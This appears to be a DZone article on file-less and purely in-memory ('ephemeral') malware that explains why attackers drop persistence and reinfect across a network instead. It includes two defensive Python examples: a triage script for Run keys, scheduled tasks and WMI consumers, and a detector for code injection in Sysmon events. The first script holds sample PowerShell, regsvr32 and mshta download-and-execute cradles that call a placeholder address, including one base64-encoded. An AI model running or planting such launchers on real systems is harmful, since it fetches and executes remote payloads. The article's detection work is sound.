An entirely new class of malware that infects entire networks of systems and counts on infection scale, rather than any specific technical mechanism, to support persistence.
In the past, we've all used some variant of the cyber kill chain to model how malware campaigns work. Sometimes we use the actual one, from Lockheed Martin, other times something similar, but they all include a step where attackers gain persistence on the compromised system (the "Installation" phase in the Lockheed Martin model).
About a decade ago, file-less malware started to emerge: malware strains that don't rely on file-based storage. Instead, they gain persistence by stashing themselves in places like the registry, where a value can hold a script or a blob of shellcode. While registry storage is the most popular, other avenues include dropping registry Run keys that don't store code at all, but rather a command line that downloads a remotely staged payload and executes it in memory. Windows Management Instrumentation (WMI) is another file-less storage technique: WMI maintains its own repository, where attackers can register a permanent event subscription (an event filter, an event consumer and a binding between them) that stashes code and runs it later, whenever the chosen event fires. Group Policy Objects and scheduled tasks are two other ways attackers avoid using files for malware storage, and they work in a similar way to the techniques above: the policy or task carries a command line rather than a binary on disk.
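What the command-based variants leave behind is a launcher string rather than a binary, so a defender who dumps Run keys, scheduled-task actions and WMI command-line event consumers can triage them by what the string does. The following Python is an added example written for this article, not code from the original post: it tags each persistence entry with the file-less techniques it uses (script-host launcher, download cradle, inline script, registry-resident payload, encoded PowerShell command) and decodes any `-EncodedCommand` blob so the indicators also run over the hidden command. The entries, paths and the 192.0.2.10 address are constructed samples, not real campaign artifacts.

```python
import base64
import re

# Constructed encoded PowerShell command, built the way attackers build one:
# base64 over the UTF-16LE bytes of the script.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/b')".encode("utf-16le")
).decode()

# Constructed sample persistence entries: (location, command line).  Only the
# first and last point at an ordinary binary on disk.
SAMPLE_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     r'''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"'''),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Stage",
     r"regsvr32.exe /s /n /u /i:http://192.0.2.10/s.sct scrobj.dll"),
    (r"Task\Microsoft\Windows\Sync",
     r'mshta.exe javascript:eval(new ActiveXObject("WScript.Shell").RegRead("HKCU\\Software\\X\\p"))'),
    (r"WMI\root\subscription\CommandLineEventConsumer\svc",
     f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"),
    (r"Task\Backup",
     r'"C:\Program Files\Backup\backup.exe" --nightly'),
]

# Built-in interpreters and proxy-execution binaries that run code they do not own.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                "wscript.exe", "cscript.exe", "certutil.exe", "cmd.exe"}

INDICATORS = {
    # Fetches a remotely staged payload instead of carrying one.
    "remote_download": re.compile(r"https?://|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|/i:http", re.I),
    # Runs script text straight from the command line or a scriptlet.
    "inline_script": re.compile(r"javascript:|vbscript:|\bIEX\b|Invoke-Expression|\.sct\b|scrobj\.dll", re.I),
    # Pulls the real payload out of a registry value.
    "registry_payload": re.compile(r"RegRead|Get-ItemProperty|\bHK(?:CU|LM)\\", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{24,})", re.I)


def launcher(command):
    """Lower-cased basename of the program a Windows command line starts."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        exe = command[1:end] if end > 0 else command[1:]
    else:
        exe = command.split(None, 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded(command):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); '' if none is present."""
    match = ENC_RE.search(command)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def classify(command):
    """Return (launcher, sorted tags) describing the file-less techniques in a command line."""
    tags = set()
    host = launcher(command)
    if host in SCRIPT_HOSTS:
        tags.add("script_host")
    decoded = decode_encoded(command)
    if decoded:
        tags.add("encoded_command")
    # Scan the visible command and, when present, the decoded one.
    for text in (command, decoded):
        for name, pattern in INDICATORS.items():
            if text and pattern.search(text):
                tags.add(name)
    return host, sorted(tags)


def triage(entries):
    """Keep only entries that carry at least one file-less indicator."""
    hits = []
    for location, command in entries:
        host, tags = classify(command)
        if tags:
            hits.append((location, host, tags))
    return hits


if __name__ == "__main__":
    for location, host, tags in triage(SAMPLE_ENTRIES):
        print(f"{location}\n    {host}: {', '.join(tags)}")
```

Run against the constructed samples, the two entries that launch a real executable produce no tags, while the four command-based entries are each tagged with how they avoid the disk. The point of decoding the `-Enc` blob is that the WMI consumer looks harmless until the hidden download cradle is revealed; a scanner that only matches the visible string would miss it.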
Attackers have recently begun to move more strongly toward complete in-memory execution, skipping local persistence altogether. This isn't really new: Code Red, in 2001, executed completely in memory, and Meterpreter, the popular Metasploit payload, was originally released in 2006. These ideas have been around and have been used, but the campaigns built on them have almost always acquired some kind of persistence on the compromised system. That's starting to change, beginning with Duqu 2.0, which Kaspersky found in its own network just a few years ago and which lived almost entirely in memory.
Malware authors realized something: they don't need to acquire persistence if the system is still going to be vulnerable after it reboots or its memory is otherwise cleared, because they can simply reinfect it. Persistence mechanisms (Run keys, services, scheduled tasks, WMI subscriptions) are far more visible to defenders today than in-memory techniques are, so avoiding the need to persist makes attacking code much harder to find. Purely in-memory techniques turned out to be both feasible and difficult to see, and we're seeing more and more of this today.
Detecting these kinds of attacks, especially while they're dormant, is very difficult. Loading a small DLL into a common, long-running system process like Explorer, or into your local anti-virus, is hard to see, and it gives attackers access to that system whenever they want it, if they want it. Most anti-virus products can detect the classic sequence of system calls used to inject code into a running process (allocate memory in the target, write the payload into it, start a remote thread), but attackers keep coming up with different ways to execute these attacks, and those aren't detected today.
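The "classic sequence" the anti-virus catches also shows up in endpoint telemetry, and the same telemetry can flag the quieter variants that never take the obvious path. The Python below is an added example written for this article, not code from the original post: it runs three rules over Sysmon-style events (IDs 8 CreateRemoteThread, 10 ProcessAccess and 7 ImageLoad) and reports threads started in Explorer or the anti-virus at an address backed by no module, handles opened on those processes with write-plus-thread rights from an unexpected source, and unsigned DLLs loaded into them from user-writable paths. The events, paths and allow-list are constructed samples; `avservice.exe` is an assumed placeholder name for a local anti-virus engine, not a real product.

```python
import re

# Injection targets worth watching: always running, long-lived, trusted.
# "avservice.exe" is an assumed placeholder for a local anti-virus engine.
SENSITIVE_TARGETS = {"explorer.exe", "avservice.exe"}

# Sources that legitimately open or thread into those targets.  Constructed
# example; in practice this comes from a baseline of the estate.
ALLOWED_SOURCES = {"csrss.exe", "svchost.exe", "avservice.exe"}

# Process access rights (winnt.h) that the write-then-thread injection pattern needs.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Paths an unprivileged user can write to; a DLL loaded from here into a system
# process has no business being there.
USER_WRITABLE = re.compile(r"^C:\\(Users|ProgramData|Windows\\Temp)\\", re.I)

# Constructed Sysmon-style events (field names follow Sysmon's schema).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d6e4|C:\Windows\System32\KERNELBASE.dll+2c45e"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d6e4|UNKNOWN(000001C2A3F0042B)"},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x00007FFD2B3C0000",
     "StartModule": "-", "StartFunction": "-"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x00007FFD9A1B2C30",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "CtrlRoutine"},
    {"EventID": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\shell32.dll", "Signed": "true"},
    {"EventID": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\Sync\helper.dll", "Signed": "false"},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Vendor\tray.exe",
     "TargetImage": r"C:\Program Files\AV\avservice.exe", "StartAddress": "0x00007FFD11220000",
     "StartModule": "-", "StartFunction": "-"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage_event(ev):
    """Return (severity, reason) if the event looks like code injection, else None."""
    eid = ev["EventID"]
    if eid in (8, 10):
        src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
        if dst not in SENSITIVE_TARGETS or src in ALLOWED_SOURCES or src == dst:
            return None
        if eid == 8:  # CreateRemoteThread
            # A start address inside no loaded module means the thread runs
            # code that was written into the process, not a DLL's export.
            if ev.get("StartModule", "-") == "-":
                return ("high", f"{src} started a thread in {dst} at an address backed by no module")
            return ("medium", f"{src} started a thread in {dst} at {ev['StartModule']}!{ev.get('StartFunction', '?')}")
        granted = int(ev["GrantedAccess"], 16)  # ProcessAccess
        if granted & INJECT_MASK == INJECT_MASK:
            # UNKNOWN frames in the call stack mean the caller itself runs from
            # unbacked memory: an injected stage opening its next target.
            severity = "high" if "UNKNOWN" in ev.get("CallTrace", "") else "medium"
            return (severity, f"{src} opened {dst} with write+thread rights (0x{granted:X})")
        return None
    if eid == 7:  # ImageLoad
        host, dll = basename(ev["Image"]), ev["ImageLoaded"]
        if host in SENSITIVE_TARGETS and ev.get("Signed", "false").lower() != "true" and USER_WRITABLE.match(dll):
            return ("medium", f"{host} loaded unsigned {dll} from a user-writable path")
    return None


def triage(events):
    """Return [(event index, severity, reason)] for every event that fires a rule."""
    findings = []
    for index, ev in enumerate(events):
        result = triage_event(ev)
        if result:
            findings.append((index, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for index, severity, reason in triage(SAMPLE_EVENTS):
        print(f"[{severity}] event {index}: {reason}")
```

On the constructed sample, the svchost handle with query-only rights, the csrss thread that lands in a named kernel32 export and the signed shell32 load all pass, while the Temp-directory binary is caught twice (the handle it opens and the thread it starts), the unsigned DLL in Explorer is flagged, and the thread planted in the anti-virus process is flagged. The caveat the paragraph above raises still applies: an injector that hijacks an existing thread or queues an APC never produces event 8 at all, so the process-access and unbacked-call-stack rules carry the weight there, and a periodic scan for executable private memory regions with no file backing is the complement to all three.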
This gives us an entirely new class of malware: one that infects entire networks of systems and counts on infection scale, rather than any specific technical mechanism on any single host, to support persistence. Lose one host to a reboot and another infected host simply reinfects it.
Welcome to the brave new world of Ephemeral Malware.
Opinions expressed by DZone contributors are their own.